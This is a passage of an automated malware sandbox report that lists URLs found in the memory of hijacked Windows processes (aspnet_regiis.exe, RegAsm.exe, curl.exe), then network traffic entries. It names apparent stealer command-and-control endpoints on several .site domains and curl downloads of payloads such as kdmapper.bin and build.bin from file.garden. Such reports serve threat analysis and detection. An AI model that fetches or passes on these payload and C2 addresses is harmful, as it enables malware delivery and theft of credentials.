                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delaylacedmn.site/41
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delaylacedmn.site/api
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorationmsn.store/
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000925000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1549845649.0000000000923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorationmsn.store/api
                                Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://famikyjdiag.site/
                                Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://famikyjdiag.site/api
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://famikyjdiag.site/apiW
                                Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://famikyjdiag.site/d1
                                Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://famikyjdiag.site/l1
                                Source: curl.exe, 00000015.00000003.1318656770.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin
                                Source: curl.exe, 00000015.00000002.1327969489.000001FE19AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin--outputC:
                                Source: curl.exe, 00000015.00000002.1338068890.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1313373390.000001FE19AD9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1318656770.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.biny
                                Source: curl.exe, 00000037.00000002.1497161944.000002E955E40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1494320625.000002E955E52000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1493649612.000002E955E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.bin
                                Source: curl.exe, 00000037.00000002.1497161944.000002E955E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.bin--outputC:
                                Source: curl.exe, 00000037.00000003.1493561295.000002E955E79000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.1497355891.000002E955E7A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1493649612.000002E955E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.bin6
                                Source: curl.exe, 00000037.00000002.1497161944.000002E955E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.binjWs64
                                Source: curl.exe, 00000029.00000002.1465251483.000001F5B2190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
                                Source: curl.exe, 00000029.00000002.1465251483.000001F5B2190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
                                Source: curl.exe, 0000001F.00000002.1397098489.000001EC889A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889B6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395498898.000001EC889B6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397098489.000001EC889A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395437445.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395457647.000001EC889B3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
                                Source: curl.exe, 0000001F.00000002.1397098489.000001EC889A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
                                Source: curl.exe, 0000001F.00000003.1395366258.000001EC889D9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395437445.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin9A
                                Source: curl.exe, 0000001F.00000002.1397098489.000001EC889A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bins
                                Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.ste0
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/T1
                                Source: RegAsm.exe, 0000002F.00000002.1500499974.0000000001171000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/api
                                Source: RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/apiB
                                Source: RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/apiC
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site/t1
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offeviablwke.site:443/api
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://possiwreeste.site/api;
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                                Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                Source: aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                                Source: RegAsm.exe, 0000002F.00000002.1499950256.0000000001151000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                                Source: RegAsm.exe, 0000002F.00000002.1499950256.0000000001151000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                                Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1499818933.000000000114E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
                                Source: aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                                Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://underlinemdsj.site/
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://underlinemdsj.site/api
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://underlinemdsj.site/apiN
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.000000000090C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://writekdmsnu.site/
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://writekdmsnu.site/api
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
